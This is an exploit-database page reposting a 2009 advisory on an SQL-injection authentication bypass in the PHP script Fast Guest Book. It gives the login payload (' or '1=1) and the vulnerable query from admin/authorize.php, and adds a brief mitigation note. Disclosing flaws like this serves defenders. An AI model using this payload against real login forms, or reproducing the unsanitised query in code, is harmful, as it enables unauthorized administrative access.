header-logo
Suggest Exploit
vendor:
Fast Guest Book
by:
Moudi
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Fast Guest Book
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Fast Guest Book (Auth Bypass) SQL Injection Vulnerability

A vulnerability exists in Fast Guest Book, which allows an attacker to bypass authentication and gain access to the admin panel. This is due to the application failing to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by supplying a specially crafted 'or' statement in the username field.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in an SQL query.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================

==============================================================================
    Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
==============================================================================

	[»] Script:             [ Fast Guest Book ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://fastcreators.com/products/guestbook/download.php ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
        [»] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===	
	
	[»] ' or '1=1

===[ BUG ]===	

        [»] Bug In \admin\authorize.php

            $query = "select * from admin where userid='{$_POST['uname']}' AND
            pass='{$_POST['pass']}'";



Author: Moudi

###########################################################################

# milw0rm.com [2009-01-11]

Navigation

Suggest Exploit

Services By CQR